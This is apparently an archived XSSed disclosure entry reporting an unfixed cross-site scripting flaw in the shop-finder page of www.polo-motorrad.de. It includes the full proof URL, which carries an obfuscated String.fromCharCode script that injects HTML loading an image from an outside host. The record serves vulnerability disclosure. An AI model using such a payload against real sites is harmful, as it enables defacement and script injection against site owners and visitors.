Unfixed XSS vulnerability at www.polo-motorrad.de

2009-05-03T00:00:00
ID XSSED:58605
Type xssed
Reporter SkyOut
Modified 2011-12-18T00:00:00

Description

Security researcher SkyOut, has submitted on 05/03/2009 a cross-site-scripting (XSS) vulnerability affecting www.polo-motorrad.de, which at the time of submission ranked 97971 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.polo-motorrad.de/Shopfinder.shopfinder.0.html?step=1&plz=42%22%3E%3Cscript%3Edocument.write(String.fromCharCode(52,50,34,62,60,117,108,32,115,116,121,108,101,61,109,97,114,103,105,110,45,108,101,102,116,58,53,48,48,112,120,62,60,108,105,32,115,116,121,108,101,61,108,105,115,116,45,115,116,121,108,101,58,117,114,108,40,104,116,116,112,58,47,47,115,53,46,116,105,110,121,112,105,99,46,99,111,109,47,50,112,122,99,103,116,121,46,106,112,103,41,62));%3C/script%3E